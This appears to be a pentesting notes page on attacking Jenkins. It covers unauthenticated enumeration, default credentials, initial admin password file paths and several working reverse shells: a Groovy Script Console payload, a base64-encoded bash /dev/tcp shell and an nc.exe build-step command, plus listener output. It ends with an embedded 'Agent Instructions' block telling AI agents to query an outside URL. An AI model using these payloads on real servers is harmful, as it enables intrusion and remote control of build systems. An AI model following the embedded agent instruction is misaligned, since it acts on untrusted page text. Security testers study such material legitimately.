# Jenkins ## Introduction Jenkins is a free and open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat. ![Jenkins Login.](/files/-MkcfIiWHBn1_lAeMz0V) ## Enumeration We can obtain a some valuable information without necessarily log in on the server. ### Jenkins Version Visit the following route to obtain the Jenkins version on the footer page. ``` /oops /error Page generated: Sep 27, 2021 12:46:28 PM PDTREST APIJenkins ver. 2.204.1 ``` ### Users Without credentials it is possible to obtain some users. ``` /people /people/ /asynchPeople /asynchPeople/ /securityRealm/user/admin/search/index?q= ``` ## Credentials There are no default credentials but some times these works. ``` admin:admin admin:password admin:jenkins ``` In new versions the password is randomized at installation. We can find the initial password here: * **Linux** ``` /var/jenkins_home/secrets/initialAdminPassword /home/jenkins/secrets/initialAdminPassword /var/lib/jenkins/secrets/initialAdminPassword /opt/jenkins/secrets/initialAdminPassword ``` * **Windows** ``` C:\Program Files (x86)\Jenkins\secrets\initialAdminPassword C:\Program Files\Jenkins\secrets\initialAdminPassword ``` ## From Admin to Reverse Shell There are multiple ways in which from administrative privileges in Jenkins you can get a reverse shell. ### Script Console To obtain a Reverse shell we need to execute **`Manage Jenkins`** on **`Script Console.`** ![Jenking Script Console.](/files/-MkcGu6VLnTGheS0Qolx) #### Windows Reverse Shell ``` String host=""; int port=; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` #### Linux Reverse Shell First we need to craft the payload. ``` $ echo "bash -c 'bash -i >& /dev/tcp/10.10.10.10/443 0>&1'" | base64 YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDMgMD4mMScK ``` And introduce inside the Grovvy script. ``` def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDMgMD4mMScK}|{base64,-d}|{bash,-i}'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` ### Freestyle Project Go on **`New Item`** tab. ![Jenkins Dashboard](/files/-Mkcf0ZpYEVTxIg_AqcU) Introduce a name such as **`Access`** and select **`Freestyle Project`** . ![Jenkins Creating a New Item.](/files/-Mkch4rPWy5gXeAoXxS8) Scroll down until you find the **`Build`** section and add a **`Execute Windows batch command`** as build step. ![Jenkins Execute Windows Batch Command.](/files/-MkchfAQ4kGUOLsRBJRO) Introduce the reverse shell on the Command window and click **`Save`**. ``` \\10.10.10.10\share\nc.exe -e cmd.exe 10.10.10.10 ``` Go to **`Build Now`** section. ![Jenkins Build Now section.](/files/-MkciZ2FdCeVpibAmJv8) When the build is executed a new item will be displayed under the **`Build History`**. ![Jenkins Build History.](/files/-Mkcj6uBVzUK6H6PF6Mh) At that moment a reverse shell is obtained. ``` $ sudo nc -lvp 443 listening on [any] 443 ... connect to [10.10.10.11] from (UNKNOWN) [10.10.10.11] 26524 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32> ``` We can also check the console output selecting the **`Built Item #1`** and going to **`Console Output`** section. ![Jenkins Console Output.](/files/-Mkck2ZEARr7fXs36Y3L) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mvc1009.gitbook.io/hackingnotes/software/jenkins.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.